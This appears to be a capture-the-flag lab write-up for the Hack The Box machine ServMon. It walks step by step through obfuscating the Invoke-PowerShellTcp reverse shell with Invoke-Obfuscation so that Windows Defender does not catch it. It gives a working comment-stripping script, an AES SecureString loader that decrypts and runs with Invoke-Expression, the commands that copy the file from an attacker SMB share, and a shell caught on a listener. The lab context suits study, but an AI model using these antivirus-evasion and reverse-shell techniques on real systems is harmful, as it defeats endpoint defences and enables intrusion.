AV Evasion


While there are many techniques to evade AV, I will use the Invoke-Obfuscation script for this operation.

Invoke-Obfuscation


First of all, remove every comment from the script. Windows Defender's signature-based detection may match on the comment text itself (author name, project URL, function description), so it should not be left in the file that gets obfuscated.
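The comment removal can be done with the PowerShell tokenizer rather than by hand or with a regex, which would also strip a `#` that sits inside a string literal. This is an added example, not part of the original write-up or of Invoke-Obfuscation; the input and output paths are assumptions.

```powershell
# Added example: strip every comment token from a PowerShell script before it is
# fed to Invoke-Obfuscation. Paths are assumptions for this write-up's layout.
$InPath  = '/home/kali/archive/htb/labs/servmon/nsclient/Invoke-PowerShellTcp.ps1'
$OutPath = '/home/kali/archive/htb/labs/servmon/nsclient/Invoke-PowerShellTcp.nocomments.ps1'

$source = Get-Content -Path $InPath -Raw
$errors = $null
# The tokenizer classifies every lexical token, so comments (both '# ...' and
# '<# ... #>') are removed by token type, never by pattern matching on '#'.
$tokens = [System.Management.Automation.PSParser]::Tokenize($source, [ref]$errors)
if ($errors.Count -gt 0) {
    throw "Parse errors in ${InPath}: $($errors | Out-String)"
}

$sb  = [System.Text.StringBuilder]::new()
$pos = 0
foreach ($t in $tokens) {
    if ($t.Type -eq [System.Management.Automation.PSTokenType]::Comment) {
        # Copy everything up to the comment, then skip over the comment itself.
        [void]$sb.Append($source.Substring($pos, $t.Start - $pos))
        $pos = $t.Start + $t.Length
    }
}
[void]$sb.Append($source.Substring($pos))

# Drop the lines that are now empty because a full-line comment was removed.
$clean = ($sb.ToString() -split "`r?`n" | Where-Object { $_.Trim() -ne '' }) -join "`n"
Set-Content -Path $OutPath -Value $clean -NoNewline

# Quick sanity check: the result must still parse, and must contain no comment tokens.
$check = $null
$left  = [System.Management.Automation.PSParser]::Tokenize($clean, [ref]$check) |
         Where-Object { $_.Type -eq [System.Management.Automation.PSTokenType]::Comment }
if ($check.Count -gt 0 -or $left) { throw 'comment stripping produced a broken script' }
Write-Output "wrote $OutPath ($($clean.Length) chars, was $($source.Length))"
```

Point Invoke-Obfuscation's `SET SCRIPTPATH` at the `.nocomments.ps1` file instead of the original.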

┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ pwsh    
PowerShell 7.2.6
Copyright (c) Microsoft Corporation.
 
https://aka.ms/powershell
Type 'help' to get help.
 
 
┌──(kali㉿kali)-[/home/kali/archive/htb/labs/servmon/nsclient]
└─PS> 

Start up a PowerShell session in Kali

┌──(kali㉿kali)-[/home/kali/archive/htb/labs/servmon]
└─PS> cd /home/kali/Tools/Invoke-Obfuscation/ ; Import-Module ./Invoke-Obfuscation.psd1
 
┌──(kali㉿kali)-[/home/kali/Tools/Invoke-Obfuscation]
└─PS> Invoke-Obfuscation

Import the module and fire it up

Loaded

Setting the script


Invoke-Obfuscation> SET SCRIPTPATH /home/kali/archive/htb/labs/servmon/nsclient/Invoke-PowerShellTcp.ps1
 
Successfully set ScriptPath:
/home/kali/archive/htb/labs/servmon/nsclient/Invoke-PowerShellTcp.ps1

Within the Invoke-Obfuscation session, set the [[servmon_payload#invoke-powershelltcp.ps1|PowerShell script]] to obfuscate.

AST Nodes


Choose one of the below options:
 
[*] TOKEN	Obfuscate PowerShell command Tokens
[*] AST		Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING	Obfuscate entire command as a String
[*] ENCODING	Obfuscate entire command via Encoding
[*] COMPRESS	Convert entire command to one-liner and Compress
[*] LAUNCHER	Obfuscate command args w/Launcher techniques (run once at end)
 
 
Invoke-Obfuscation> AST
 
 
Choose one of the below AST options:
 
[*] AST\NamedAttributeArgumentAst	Obfuscate NamedAttributeArgumentAst nodes
[*] AST\ParamBlockAst			Obfuscate ParamBlockAst nodes
[*] AST\ScriptBlockAst			Obfuscate ScriptBlockAst nodes
[*] AST\AttributeAst			Obfuscate AttributeAst nodes
[*] AST\BinaryExpressionAst		Obfuscate BinaryExpressionAst nodes
[*] AST\HashtableAst			Obfuscate HashtableAst nodes
[*] AST\CommandAst			Obfuscate CommandAst nodes
[*] AST\AssignmentStatementAst		Obfuscate AssignmentStatementAst nodes
[*] AST\TypeExpressionAst		Obfuscate TypeExpressionAst nodes
[*] AST\TypeConstraintAst		Obfuscate TypeConstraintAst nodes
[*] AST\ALL				Select All choices from above
 
 
Invoke-Obfuscation\AST> ALL
 
 
Choose one of the below AST\All options to APPLY to current payload:
 
[*] AST\ALL\1		Execute ALL Ast obfuscation techniques
 
Invoke-Obfuscation\AST\All> 1
 
Executed:	
  CLI:  AST\All\1
  FULL: Out-ObfuscatedAst -ScriptBlock $ScriptBlock
 
Result:	
 
[...REDACTED...]

First, obfuscate the script by applying every available AST-node technique. The result is redacted here, as it is well over 10,000 characters.

This alone is already a big improvement against Windows Defender's static signatures, but I am not done yet; better safe than sorry.

Invoke-Obfuscation\AST\All> back
Invoke-Obfuscation\AST> back

Go back twice to return to the main menu.

AES Encryption


Choose one of the below options:
 
[*] TOKEN	Obfuscate PowerShell command Tokens
[*] AST		Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING	Obfuscate entire command as a String
[*] ENCODING	Obfuscate entire command via Encoding
[*] COMPRESS	Convert entire command to one-liner and Compress
[*] LAUNCHER	Obfuscate command args w/Launcher techniques (run once at end)
 
 
Invoke-Obfuscation> ENCODING
 
 
Choose one of the below Encoding options to APPLY to current payload:
 
[*] ENCODING\1		Encode entire command as ASCII
[*] ENCODING\2		Encode entire command as Hex
[*] ENCODING\3		Encode entire command as Octal
[*] ENCODING\4		Encode entire command as Binary
[*] ENCODING\5		Encrypt entire command as SecureString (AES)
[*] ENCODING\6		Encode entire command as BXOR
[*] ENCODING\7		Encode entire command as Special Characters
[*] ENCODING\8		Encode entire command as Whitespace
 
 
Invoke-Obfuscation\Encoding> 5
 
Executed:	
  CLI:  Encoding\5
  FULL: Out-SecureStringCommand -ScriptBlock $ScriptBlock -PassThru
 
Result:	
 
[...REDACTED...]
 
WARNING: This command exceeds the cmd.exe maximum length of 8190.
         Its length is 31808 characters.

On top of the AST obfuscation above, encrypt the result again as a SecureString (AES). The output is an AES-encrypted blob together with the code that decrypts and runs it, so none of the original script text is left for Windows Defender's static signatures to match. Note that the key has to ship alongside the blob and the plaintext is rebuilt in memory when the payload runs, so this defeats on-disk scanning rather than runtime inspection of the decrypted script.

There is also a warning that the result exceeds cmd.exe's maximum command-line length of 8190 characters (it is 31808). That only matters if the payload is passed as a one-liner on the command line; here it is written to a .ps1 file and run as a script, so the limit does not apply.
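To make clear what the ENCODING\5 step actually produces, here is the same SecureString (AES) round trip in miniature. This is an added illustration written for this page, not Invoke-Obfuscation's own `Out-SecureStringCommand`; the one-line stand-in payload is an assumption and stands in for the obfuscated reverse shell.

```powershell
# Added example: the SecureString (AES) encoding that ENCODING\5 applies, shown
# end to end. $Script is a constructed stand-in for the real payload.
$Script = "Write-Output ('running as ' + [Environment]::UserName)"

# ConvertFrom-SecureString -Key uses AES; a 32-byte key gives AES-256.
$Key = New-Object byte[] 32
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($Key)

# Build side: encrypt the script text. $Encrypted is a hex blob in which nothing
# of the original text survives, which is why static signatures no longer match.
$Encrypted = ConvertTo-SecureString -String $Script -AsPlainText -Force |
             ConvertFrom-SecureString -Key $Key
if ($Encrypted.Contains('Write-Output')) { throw 'plaintext leaked into blob' }

# The key has to travel with the blob; in the real payload both are embedded in
# the generated launcher, so anyone holding the file can decrypt it too.
$KeyLiteral = ($Key | ForEach-Object { $_ }) -join ','

# Runtime side: rebuild the SecureString from blob + key, pull the plaintext back
# out through a BSTR, and execute it. This is the point where the decrypted
# script exists in memory and is visible to runtime inspection such as AMSI.
$Secure = ConvertTo-SecureString -String $Encrypted -Key ([byte[]]($KeyLiteral -split ','))
$Bstr   = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Secure)
try     { $Plain = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Bstr) }
finally { [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Bstr) }

if ($Plain -ne $Script) { throw 'round trip failed' }
Invoke-Expression $Plain
Write-Output ("blob length {0} chars for a {1}-char script" -f $Encrypted.Length, $Script.Length)
```

The size growth seen in the `wc -m` comparison below comes from the same place: every byte of the (already AST-expanded) script becomes several hex characters in the blob, plus the embedded key and decryption stub.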

Export


Invoke-Obfuscation> OUT 
 
Enter path for output file (or leave blank for default): /home/kali/archive/htb/labs/servmon/nsclient/obfuscated.ps1
 
Successfully output ObfuscatedCommand to /home/kali/archive/htb/labs/servmon/nsclient/obfuscated.ps1.

Write the final result to /home/kali/archive/htb/labs/servmon/nsclient/obfuscated.ps1

I would include the final result here, but it would likely break the Markdown viewer, so I am only showing the difference in character count.

┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ wc -m Invoke-PowerShellTcp.ps1 
2657 Invoke-PowerShellTcp.ps1
 
┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ wc -m obfuscated.ps1          
31809 obfuscated.ps1

The obfuscated.ps1 is about 12 times the size of the original.

Validation


PS C:\tmp> copy \\10.10.14.11\smb\nsclient\obfuscated.ps1 .
PS C:\tmp> dir 
 
 
    Directory: C:\tmp
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/30/2023   4:02 AM          31809 obfuscated.ps1

The file can now be copied onto the target without Windows Defender quarantining it on write.

PS C:\tmp> .\obfuscated.ps1 
 
┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ nnc 1234                        
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.184] 49819
Windows PowerShell running as user nadine on SERVMON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
 
PS C:\tmp> whoami
servmon\nadine
PS C:\tmp> hostname
ServMon
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::141
   IPv6 Address. . . . . . . . . . . : dead:beef::ad15:f642:8c65:862d
   Link-local IPv6 Address . . . . . : fe80::ad15:f642:8c65:862d%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.184
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
                                       10.10.10.2

It works!

The obfuscated payload is now ready.